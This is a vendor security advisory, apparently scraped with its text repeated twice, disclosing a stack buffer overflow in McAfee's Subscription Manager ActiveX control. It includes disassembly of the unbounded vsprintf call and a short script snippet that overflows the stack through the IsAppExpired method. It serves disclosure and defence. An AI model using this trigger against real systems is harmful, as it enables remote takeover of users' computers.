Advisories
McAfee Subscription Manager Stack Buffer Overflow
Release Date:
August 5, 2006
Date Reported:
July 19, 2006
Patch Development Time (In Days):
Severity:
Critical
Vendor:
McAfee
Systems Affected:
McAfee AntiSpyware 1.x, 2.x
McAfee Internet Security Suite 6.x, 7.x, 8.x
McAfee Personal Firewall Plus 5.x, 6.x, 7.x
McAfee Privacy Service 6.x, 7.x, 8.x
McAfee QuickClean 4.x, 5.x, 6.x
McAfee SpamKiller 5.x, 6.x, 7.x
McAfee VirusScan 8.x, 9.x, 10.x
McAfee Wireless Home Network Security 1.x
Overview:
eEye Digital Security has discovered a vulnerability in McAfee Security Center that ships with all McAfee consumer products. There is a remote code execution vulnerability that allows an attacker to take complete control of a remote computer by exploiting a vulnerability found in the Subscription Manager ActiveX control.
Technical Details:
A stack buffer overflow vulnerability exists in McAfee’s Subscription Manager ActiveX control which is shipped with all Home and Home Business products. The McSubMgr.dll is a manager module used to control subscriptions of a particular product to ensure that the software has not exceeded its subscription time as well as various maintenance checks (i.e. Expirations, Old Applications, etc.). Unfortunately McSubMgr.dll is set as safe for scripting, so we are able to call various members from within the .dll from a webpage by referencing its CLSID and passing arguments to these members. The vulnerability occurs when we pass a string of over 3000 bytes using various members which are then passed on to a vulnerable vsprintf, causing a stack overflow to occur.
.text:02B0B27F var_BB8 = byte ptr -0BB8h <-- 3000 bytes
.text:02B0B27F arg_0 = dword ptr 8
.text:02B0B27F arg_4 = byte ptr 0Ch
.text:02B0B27F
.text:02B0B27F push ebp
.text:02B0B280 mov ebp, esp
.text:02B0B282 sub esp, 0BB8h
.text:02B0B288 lea eax, [ebp+arg_4]
.text:02B0B28B push eax ; va_list
.text:02B0B28C push [ebp+arg_0] ; char *
.text:02B0B28F lea eax, [ebp+var_BB8]
.text:02B0B295 push eax ; char *
.text:02B0B296 mov [ebp+var_BB8], 0
.text:02B0B29D call _vsprintf <-- Exploitable vsprintf
.text:02B0B2A2 add esp, 0Ch
.text:02B0B2A5 leave
.text:02B0B2A6 retn
.text:02B0B2A6 sub_2B0B27F endp
Since there are literally no bounds checking on the vsprintf when a string exceeding 3000 bytes of data is passed to a 3000 byte buffer, an overflow occurs, and we are able to execute arbitrary code. To exploit this vulnerability over the internet we must first create a web page with some scripting to create the ActiveX object and call one of the affected methods so that we may pass data along to overflow the vulnerable vsprintf.
"GK=String(165001, "a")"
"Red.IsAppExpired GK"
The above example is a code snip that will send 165001 a’s to the IsAppExpired ActiveX member therefore completely overflowing the stack.
Protection:
Retina Network Security Scanner has been updated to identify this vulnerability.
Blink - Endpoint Vulnerability Prevention - preemptively protects from this vulnerability
Vendor Status:
For more information, McAfee has published a knowledgebase article, which can be found here.
http://ts.mcafeehelp.com/faq3.asp?docid=407052
Credit:
Karl Lynn
Greetings:
Derek, Barnaby, Dre, Hugo, CSam, Barbara Parker, HD Moore, and GK for the intelligent conversation at the Shadow Bar.. See Ya Next Tuesday ;)
Copyright (c) 1998-2009 eEye Digital Security
Permission is hereby granted for the redistribution of this alert electronically. It is not to be edited in any way without express consent of eEye. If you wish to reprint the whole or any part of this alert in any other medium excluding electronic medium, please email alert@eEye.com for permission.
Disclaimer
The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are no warranties, implied or express, with regard to this information. In no event shall the author be liable for any direct or indirect damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk.
August 5, 2006
Date Reported:
July 19, 2006
Patch Development Time (In Days):
 |
|
|
|
| 17 |
Severity:
Critical
Vendor:
McAfee
Systems Affected:
McAfee AntiSpyware 1.x, 2.x
McAfee Internet Security Suite 6.x, 7.x, 8.x
McAfee Personal Firewall Plus 5.x, 6.x, 7.x
McAfee Privacy Service 6.x, 7.x, 8.x
McAfee QuickClean 4.x, 5.x, 6.x
McAfee SpamKiller 5.x, 6.x, 7.x
McAfee VirusScan 8.x, 9.x, 10.x
McAfee Wireless Home Network Security 1.x
Overview:
eEye Digital Security has discovered a vulnerability in McAfee Security Center that ships with all McAfee consumer products. There is a remote code execution vulnerability that allows an attacker to take complete control of a remote computer by exploiting a vulnerability found in the Subscription Manager ActiveX control.
Technical Details:
A stack buffer overflow vulnerability exists in McAfee’s Subscription Manager ActiveX control which is shipped with all Home and Home Business products. The McSubMgr.dll is a manager module used to control subscriptions of a particular product to ensure that the software has not exceeded its subscription time as well as various maintenance checks (i.e. Expirations, Old Applications, etc.). Unfortunately McSubMgr.dll is set as safe for scripting, so we are able to call various members from within the .dll from a webpage by referencing its CLSID and passing arguments to these members. The vulnerability occurs when we pass a string of over 3000 bytes using various members which are then passed on to a vulnerable vsprintf, causing a stack overflow to occur.
.text:02B0B27F var_BB8 = byte ptr -0BB8h <-- 3000 bytes
.text:02B0B27F arg_0 = dword ptr 8
.text:02B0B27F arg_4 = byte ptr 0Ch
.text:02B0B27F
.text:02B0B27F push ebp
.text:02B0B280 mov ebp, esp
.text:02B0B282 sub esp, 0BB8h
.text:02B0B288 lea eax, [ebp+arg_4]
.text:02B0B28B push eax ; va_list
.text:02B0B28C push [ebp+arg_0] ; char *
.text:02B0B28F lea eax, [ebp+var_BB8]
.text:02B0B295 push eax ; char *
.text:02B0B296 mov [ebp+var_BB8], 0
.text:02B0B29D call _vsprintf <-- Exploitable vsprintf
.text:02B0B2A2 add esp, 0Ch
.text:02B0B2A5 leave
.text:02B0B2A6 retn
.text:02B0B2A6 sub_2B0B27F endp
Since there are literally no bounds checking on the vsprintf when a string exceeding 3000 bytes of data is passed to a 3000 byte buffer, an overflow occurs, and we are able to execute arbitrary code. To exploit this vulnerability over the internet we must first create a web page with some scripting to create the ActiveX object and call one of the affected methods so that we may pass data along to overflow the vulnerable vsprintf.
"GK=String(165001, "a")"
"Red.IsAppExpired GK"
The above example is a code snip that will send 165001 a’s to the IsAppExpired ActiveX member therefore completely overflowing the stack.
Protection:
Retina Network Security Scanner has been updated to identify this vulnerability.
Blink - Endpoint Vulnerability Prevention - preemptively protects from this vulnerability
Vendor Status:
For more information, McAfee has published a knowledgebase article, which can be found here.
http://ts.mcafeehelp.com/faq3.asp?docid=407052
Credit:
Karl Lynn
Greetings:
Derek, Barnaby, Dre, Hugo, CSam, Barbara Parker, HD Moore, and GK for the intelligent conversation at the Shadow Bar.. See Ya Next Tuesday ;)
Copyright (c) 1998-2009 eEye Digital Security
Permission is hereby granted for the redistribution of this alert electronically. It is not to be edited in any way without express consent of eEye. If you wish to reprint the whole or any part of this alert in any other medium excluding electronic medium, please email alert@eEye.com for permission.
Disclaimer
The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are no warranties, implied or express, with regard to this information. In no event shall the author be liable for any direct or indirect damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk.
